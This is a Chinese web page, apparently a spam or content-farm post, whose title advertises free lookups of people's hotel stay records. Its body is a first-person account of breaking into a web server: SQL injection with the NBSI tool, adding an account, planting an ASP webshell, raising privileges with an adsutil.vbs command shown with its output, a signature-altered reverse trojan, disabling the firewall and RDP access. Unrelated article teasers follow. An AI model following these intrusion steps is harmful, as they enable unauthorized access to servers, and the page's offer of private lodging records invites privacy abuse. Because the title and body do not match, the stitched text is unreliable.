2020免费在线查询开宾馆记录 详细入住记录曝光

访客4年前黑客工具619

 ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。 

  二、注入 

  从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个 *** 非常好。 

  三、提升权限 

  先看哪些特权的: 

  cs cript C:\Inetpub\AdminS cripts\adsutil.vbs get /W3SVC/InProcessIsapiApps 

  得到: 

  Microsoft (R) Windows 脚本宿主版本 5.1 for Windows 

  版权所有(C) Microsoft Corporation 1996-1999. All rights reserved. 

  InProcessIsapiApps : (LIST) (5 Items) 

  "C:\WINNT\system32\idq.dll" 

  "C:\WINNT\system32\inetsrv\httpext.dll" 

  "C:\WINNT\system32\inetsrv\httpodbc.dll" 

  "C:\WINNT\system32\inetsrv\ssinc.dll" 

  "C:\WINNT\system32\msw3prt.dll" 

  把asp.dll加进去: 

  cs cript C:\Inetpub\AdminS cripts\adsutil.vbs 

  set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32 

  \inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32 

  \inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32 

  \inetsrv\asp.dll" 

  然后用asp木马加个用户,显示命令完成。 

  四、TerminalService 

  接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的 *** 大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies)大家有兴趣的话可以去试一下,它可以穿透http *** 。 

相关文章

老人拒绝戴口罩遭乘客围殴

相信现在有好多小伙伴们拿这手机都在看老人拒绝戴口罩遭乘客围殴事情吧,因为在这两天老人拒绝戴口罩遭乘客围殴的热度是非常高的,受到了广大网友们的关注,那么既然现在大家都非常关注老人拒绝戴口罩遭乘客围殴,这...

seo标题优化:我见过最牛逼的SEO标题是这样做的

seo标题优化:我见过最牛逼的SEO标题是这样做的

作为博客的我们,大多使用博客文章来排名,少部分可能受个别培训机构的影响,做地区+SEO这类词,至于那一类的人,我们暂且不考虑,那么我们在写文章的时候都是怎么写标题呢? 我曾经在写SEO文章中提到过这...

鲜茶道什么最好喝(鲜茶道加盟店须具备这些条

鲜茶道什么最好喝(鲜茶道加盟店须具备这些条

说到喝喝茶,流传着很多“传说”,比如喝茶睡不着,头泡不能喝等等,这些都是真的吗?这这些是真是假,我们看看本文就知道了。 ①睡前喝茶影响睡眠? “咖啡碱有兴奋神经的作用。不同个体对咖啡碱的耐受程...

关掉手机定位(怎么才能把手机定位关了)

关闭手机位置(怎样才能把手机位置关掉) iOS 13 系统软件产生了许多新作用,另外对客户的个人隐私保护也开展了再一次提升和提升。 例如和客户隐私保护密切相关的手机定位服务,iPhone在「自始至...

怎么找黑客微信定位软件,黑客攻击博彩网站

一、怎么微信定位软件怎么找黑客 1、黑客接单也就是说,在接下来的时间里,大型教程的内容相对较多。怎么微信定位软件攻击公司Thomspon曾参与Multics的开发。多样性来自ITS操作系统,用于实现当...

黑客帝国配音教程(黑客帝国原声)

黑客帝国配音教程(黑客帝国原声)

本文导读目录: 1、配音 怎么配笑声? 美国动画电影,笑声和惨叫声特别多,有什么技巧配处笑声和惨叫声吗? 2、为什么黑客帝国DVD国语配音转成AMV文件之后就没有声音 3、求黑客帝国音轨...